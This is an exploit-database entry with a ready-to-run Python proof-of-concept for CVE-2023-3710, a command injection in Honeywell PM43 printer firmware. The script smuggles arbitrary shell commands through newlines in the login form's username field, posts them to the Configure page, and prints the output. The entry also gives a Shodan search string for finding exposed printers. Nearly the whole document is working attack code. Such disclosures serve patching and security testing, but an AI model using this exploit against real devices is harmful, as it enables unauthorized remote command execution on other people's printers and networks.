Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)

Author: ByteHunter
type: remote
platform: hardware
port: 
date_added: 2024-03-14  
date_updated: 2024-03-14  
verified: 0  
codes: CVE-2023-3710  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 51885.py  
#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:PM43 , PM43
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Frimware Version: versions prior to P10.19.050004
#- Tested on: P10.17.019667
#- CVE : CVE-2023-3710


import requests
import argparse

BLUE = '\033[94m'
YELLOW = '\033[93m'
RESET = '\033[0m'

def banner():
    banner = """
    ╔════════════════════════════════════════════════╗
        CVE-2023-3710
        Command Injection in Honeywell PM43 Printers
        Author: ByteHunter
    ╚════════════════════════════════════════════════╝
    """
    print(YELLOW + banner + RESET)


def run_command(url, command):
    full_url = f"{url}/loadfile.lp?pageid=Configure"
    payload = {
        'username': f'hunt\n{command}\n',
        'userpassword': 'admin12345admin!!'
    }
    try:
        response = requests.post(full_url, data=payload, verify=False)
        response_text = response.text
        html_start_index = response_text.find('<html>')
        if html_start_index != -1:
            return response_text[:html_start_index]
        else:
            return response_text
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"

def main():
    parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')
    parser.add_argument('--url', dest='url', help='Target URL', required=True)
    parser.add_argument('--run', dest='command', help='Command to execute', required=True)

    args = parser.parse_args()

    response = run_command(args.url, args.command)
    print(f"{BLUE}{response}{RESET}")

if __name__ == "__main__":
    banner()
    main()